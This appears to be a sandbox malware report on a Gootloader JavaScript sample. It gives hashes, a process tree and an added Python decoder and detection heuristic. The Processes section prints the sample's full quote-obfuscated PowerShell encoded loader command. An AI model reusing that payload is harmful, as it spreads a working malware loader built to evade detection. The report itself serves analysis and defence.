Analysis
- max time kernel: 43s
- max time network: 45s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 23/09/2022, 14:28
Static task: static1
Behavioral task: behavioral1 (Sample: gootloader-payload.js, Resource: win7-20220812-en)
Behavioral task: behavioral2 (Sample: gootloader-payload.js, Resource: win10v2004-20220901-en)
General
- Target: gootloader-payload.js
- Size: 245KB
- MD5: 3793a0bc98b744d1ad1a41cad211c08d
- SHA1: 69d470c25bef8d7185263a8288114db3903979e5
- SHA256: 58105e33f351cfa7bde0c3c4dda630379f0f71ddf8dc2a1ce63ea194607f3551
- SHA512: e18b1f47db6efe21b78c81c05cb18ffbe73e3238a999858331be39a35f1548f975098ff81852f0637e9ee9170c43c0b0d8b63977d805717b7dc9333508a93b74
- SSDEEP: 1536:WRml64QvRDKbimZOQyXjdBMWxXJUGkJPZF40nuOMdo4JpqU1vmROQxB/Nfr27NV5:ShPnluOo3xBX0iRSMzelxUtIATOCsd
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the stock description attached to the signature; nothing else in this report shows file encryption, and the process tree below is a loader chain.)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid 1928 powershell.exe
  pid 1852 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege, pid 1928 powershell.exe
  Token: SeDebugPrivilege, pid 1852 powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  PID 1884 wrote to memory of 1928 (1884 wscript.exe, procid_target 27), reported three times
  PID 1928 wrote to memory of 1852 (1928 powershell.exe, procid_target 29), reported three times
  Both writes go from a parent into the child it has just spawned, which is consistent with process creation rather than injection into an unrelated process.
Processes
- C:\Windows\system32\wscript.exe, PID 1884 (tree depth 1)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader-payload.js
  Signature hits: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 1928 (tree depth 2, child of 1884)
    Command line, exactly as the sandbox recorded it (the image path is fused onto the front and the trailing "2⤵" is the page's depth marker). The double quotes sprinkled through the "/"e" argument are consumed by command-line parsing before PowerShell sees the switch, so the effective argument is /e (the short form of -EncodedCommand; powershell.exe accepts "/" as well as "-" for switches) followed by a base64 string that decodes to a UTF-16LE script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "/"e" M"gA5ADgANwA4ADUAM"QA5AD"UA"OwBzAG"wAZQ"BlAHA"AIAA"tAHMAIAA"3ADE"AO"wAkAGcAawB3AD0A"RwBlAHQ"A"LQBJAH"QAZQB"t"AFAAcgB"vAHA"AZQByAH"QAe"Q"AgAC"0AcABh"AHQAa"AAgACg"AIgBoAGsAIgA"rACIAYw"B"1AD"oAXABz"AG8A"Zg"Ai"ACsAI"gB0A"HcAIgArACI"AYQByAGU"A"XAB"tAGkAYwAiACsAIgBy"AG8AcwAi"ACsAIgBv"A"G"YAdABc"ACI"AK"wBbAEUAb"gB2AGkAcgB"vA"G4"AbQBl"AG"4"A"dABd"A"Do"AOgAoACIAdQB"zAGUAIg"Ar"A"CI"A"c"gBuAC"IA"K"w"Ai"A"GEAbQ"Bl"ACIAKQArACI"A"MAA"iACkAOwBmAG8Ac"gA"gA"Cg"AJA"BjAH"U"APQAwADsAJA"BjAHUAI"AAt"AGwAZ"QAgADcAMQAwADsA"JABj"AHU"A"KwA"rACkAewB"U"AHI"AeQ"B7A"C"QAZgB5"ACsA"PQAkAGcAawB3AC4"AJ"ABjAHU"AfQ"BDAGEAdABjAGgAewB9A"H"0AOwAkAGMAdQA9ADAAOw"B3"AGg"AaQBsAGUA"K"AAkA"HQAc"gB1AGUAKQB"7"ACQ"AY"wB1ACs"AK"wA7ACQAaw"BvA"D0AWwB"tAG"EAdA"BoAF0AOgA6ACgAIgBzAH"E"A"Ig"ArACIAcgB0ACIAKQA"oACQAY"wB1ACkA"OwBpAGYAKAAkAGsAbwAgAC"0A"ZQBxACAAMQAwADAAMA"ApA"H"sAYgB"yAG"UAYQBrAH0A"fQ"Ak"AHEAY"gByA"D0AJ"A"BmAHkALgByAGUAcABs"AGEAYwBlA"CgAI"g"AjACIALAA"kAGsAbwApADsAJA"B"p"A"HkAYQ"A9AFsA"YgB5AHQAZQBbAF0"AXQA6ADoA"KAAiA"G4A"ZQA"iACs"AIgB3A"CIAKQ"AoA"CQAcQ"BiA"H"IA"Lg"BM"AGUAbgBn"AHQAaAAv"A"DI"AKQA7AGYA"bwBy"ACgA"JA"B"jAHU"AP"Q"AwADsAJA"BjAHUAIAA"tAGw"AdAAgACQAcQ"B"iAH"IALgBMAGU"Ab"gB"nA"HQ"Aa"A"A"7ACQ"AYwB1"ACsAPQAyACkAew"AkAGkAeQBh"AFs"AJABjA"H"UA"Lw"AyAF0APQBbAGM"Abw"BuAH"YA"ZQBy"AHQAXQ"A6ADo"A"K"AA"i"A"FQ"Abw"BCACIAKw"AiA"HkAdABl"A"CIAKQAoA"C"Q"AcQB"iAHI"A"LgBTAHUAYgB"zAHQAcgBpA"G"4AZwA"oA"CQ"AY"wB1AC"wAMgAp"ACwAKAAyA"Co"AO"AA"pAC"kAf"QBbAHIAZ"QBm"AGw"A"ZQBjA"HQA"aQB"vA"G4ALgBhA"H"MA"cwBl"AG"0AY"g"BsAH"kA"XQA6AD"o"A"KAAiAEwAbwAiAC"sAI"gBhAGQAIgA"pACgAJABpAHk"AYQApADs"AWwBPAHAAZQBu"AF0"AOgA6ACgA"IgBUAGUAI"gArACIAcwB0ACIAKQAoACkAOw"A5ADYAMQA4ADIAM"AA5ADA"ANwA7A"A==2⤵
    Signature hits: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 1852 (tree depth 3, child of 1928)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /e [encoded command not preserved in this copy of the report]
      Signature hits: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      Note that this child already carries a clean /e switch: the outer powershell.exe (PID 1928) parsed the quote-obfuscated argument and re-spawned itself with the bare encoded command, so the quotes only ever hide the payload from string matching on the first command line.
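The decoding and the detection heuristics below are an added example; they are not Triage output and not the sample's own code. The only data taken from the report is the first 72 base64 characters of the PID 1928 command line, copied with their sprinkled quotes intact; stripped and decoded as base64 of UTF-16LE they yield `298785195;sleep -s 71;$gkw=`, and the rest of the argument decodes the same way. The scoring function and its inputs (a script-host parent, an encoded-command switch, quotes that split a single token, fields shaped like a Sysmon event ID 1 record) are this example's own assumptions about what to alert on, not Triage's signatures.

```python
"""Added example (not Triage output): deobfuscate and score the PowerShell
command line recorded for PID 1928 in the report above."""
import base64
import re
from typing import List, Optional

# The first 72 base64 characters of the PID 1928 command line, copied verbatim
# from the report with the sprinkled double quotes left in place.
REPORT_PREFIX = 'M"gA5ADgANwA4ADUAM"QA5AD"UA"OwBzAG"wAZQ"BlAHA"AIAA"tAHMAIAA"3ADE"AO"wAkAGcAawB3AD0A"'

# Constructed: the report's command line up to the /e switch, with the encoded
# argument truncated to REPORT_PREFIX so the example stays short.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "/"e" '
    + REPORT_PREFIX
)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # assumption: parents worth flagging
BASE64_TOKEN = r"[A-Za-z0-9+/=]+"
# -e, -ec, -enc, -encodedcommand; powershell.exe accepts "/" as well as "-".
ENCODED_SWITCH = re.compile(
    r"(?i)(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+(" + BASE64_TOKEN + ")"
)


def strip_quotes(text: str) -> str:
    """Do what the command-line parser does to this argument: drop the literal
    double quotes, which can never be part of the base64 alphabet."""
    return text.replace('"', "")


def extract_encoded_arg(cmdline: str) -> Optional[str]:
    """Return the base64 argument of an -EncodedCommand style switch, or None."""
    match = ENCODED_SWITCH.search(strip_quotes(cmdline))
    return match.group(1) if match else None


def decode_encoded_command(arg: str) -> str:
    """-EncodedCommand carries the script as base64 of UTF-16LE. A captured
    prefix (as here) is trimmed to whole base64 quanta and whole code units
    instead of raising on a cut-off tail."""
    raw = strip_quotes(arg)
    raw = raw[: len(raw) - len(raw) % 4]
    data = base64.b64decode(raw)
    data = data[: len(data) - len(data) % 2]
    return data.decode("utf-16-le")


def encode_command(script: str) -> str:
    """The forward direction, used to round-trip check the decoder."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def count_split_quotes(cmdline: str) -> int:
    """Quotes that sit between two token characters split one argument in two;
    an ordinary command line only quotes around whole arguments."""
    return len(re.findall(r'[A-Za-z0-9+/=]"[A-Za-z0-9+/=]', cmdline))


def score_process(parent_image: str, image: str, cmdline: str) -> List[str]:
    """Reasons a process-creation event resembles the chain in this report.
    The thresholds are assumptions for illustration, not tuned values."""
    reasons = []
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    child = image.rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_HOSTS and child == "powershell.exe":
        reasons.append("powershell spawned by script host")
    if extract_encoded_arg(cmdline) is not None:
        reasons.append("encoded command")
    split = count_split_quotes(cmdline)
    if split >= 5:
        reasons.append(f"{split} quotes splitting tokens")
    return reasons


if __name__ == "__main__":
    arg = extract_encoded_arg(SAMPLE_CMDLINE)
    print(decode_encoded_command(arg))
    print(score_process(r"C:\Windows\system32\wscript.exe",
                        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                        SAMPLE_CMDLINE))
```

Run against the full command line from the report, `extract_encoded_arg` picks up the whole /e argument and `decode_encoded_command` returns the complete script; against a Sysmon-style event the three reasons together separate this chain from an administrator's own `powershell -enc` invocation, which has no script-host parent and no quotes inside its base64.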
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 194783cfed5b69a042177d40c01765a5
  SHA1: 9891e4352f8183ef98c52a697c3517f221e00656
  SHA256: 88db0219d8c945d21dd4572acef9e03b90b2a456748c69ddb5644e5c5f16019b
  SHA512: 47f9c1c89de02261b8eadbf138717a23f1b8892e3114a7a710bbdd3d8cb1051cbcd7aaa80634fea111c34ad677afe6437eaf2f19fbff9c67bc835f1053240e26
  This is a Windows jump list (Recent Items) file, and 590aee7bdd69b59b is the well-known AppID for powershell.exe: it is a side effect of PowerShell being launched, not a payload written by the sample.